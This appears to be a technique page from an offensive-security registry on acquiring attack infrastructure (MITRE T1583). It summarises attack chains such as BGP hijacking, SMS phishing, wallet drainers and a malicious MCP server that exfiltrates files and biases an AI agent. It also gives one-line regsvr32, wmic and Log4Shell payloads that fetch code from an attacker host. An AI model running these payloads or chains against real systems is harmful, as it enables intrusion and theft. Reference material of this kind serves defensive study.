Acquire Infrastructure
Buy / register domains, VPS, CDN accounts, mail servers — staging infrastructure for the operation.
§ Where this technique fits
T1583 is catalogued under the Resource Development tactic of the offensive-security kill-chain. It appears in 15 approved dossiers in the registry, at an average step position of 1.6.
Authoritative reference: attack.mitre.org/techniques/T1583/.
§ Dossiers chaining this technique
- step 1 / 6
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- step 1 / 5
IMSI catcher → force 2G downgrade → SMS / call intercept
Operate a rogue base station in the target area. Phones associate; force fallback to 2G where no mutual auth is required. Intercept SMS OTPs, sniff voice calls, push notifications fail silently.
- step 1 / 5
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker's AS; traffic for that prefix flows through the attacker for inspection / DoS.
- step 1 / 6
Mass SMS phish → Okta-style portal → SaaS sprawl (0ktapus)
Wide SMS phishing campaign targeting employees of ~130 organisations with a single phishlet that captures Okta credentials + push approval. Mass automated logins to Twilio, MailChimp, DoorDash et al.
- step 1 / 6
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- step 1 / 5
Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's a signed Microsoft binary — attacker JS runs in its context.
- step 1 / 4
wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- step 1 / 5
Hardware wallet supply-chain tamper → pre-seeded seed
Intercept Trezor / Ledger / KeepKey in transit (or counterfeit on Amazon / eBay). Replace device with one that already has a known seed phrase the attacker controls — victim deposits, attacker drains.
- step 1 / 6
Wallet drainer dApp → setApprovalForAll → instant theft
Victim connects their wallet to a phishing dApp (fake mint / fake airdrop). One click on 'Confirm' calls setApprovalForAll on every valuable NFT collection — drained moments later.
- step 1 / 6
DNS rebinding → access internal router admin from a browser
Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.
- step 1 / 5
Autodiscover external leak → credential harvest
Mis-implemented Autodiscover falls back to autodiscover.<TLD>; register that domain externally, harvest plaintext Basic-auth credentials from clients that haven't been patched / configured properly.
- step 2 / 6
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- step 3 / 7
Permissive SPF / DMARC p=none → CEO impersonation BEC
Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.
- step 4 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- step 4 / 7
Reconfigure MFP LDAP → harvest service-account credentials
Walk up to / network-into the MFP admin web panel (default creds), change the LDAP address-book server to attacker IP — printer immediately re-binds and sends its service-account creds in cleartext.
§ What commonly comes next
- 01 Phishing (seen 3×) · T1566 · Initial Access
- 02 GitHub / GitLab Dorking (seen 2×) · W-RECON-GITHUB-DORK · Reconnaissance
- 03 Application Layer Protocol (seen 1×) · T1071 · Command and Control
- 04 BGP Route Hijack (seen 1×) · NET-BGP-HIJACK · Lateral Movement
- 05 Command and Scripting Interpreter (seen 1×) · T1059 · Execution
- 06 Evil Twin / Rogue AP (seen 1×) · WIFI-EVIL-TWIN · Initial Access
- 07 Hardware Wallet Supply-Chain Tamper (seen 1×) · WLT-HW-SUPPLY · Initial Access
- 08 Modify Authentication Process (seen 1×) · T1556 · Credential Access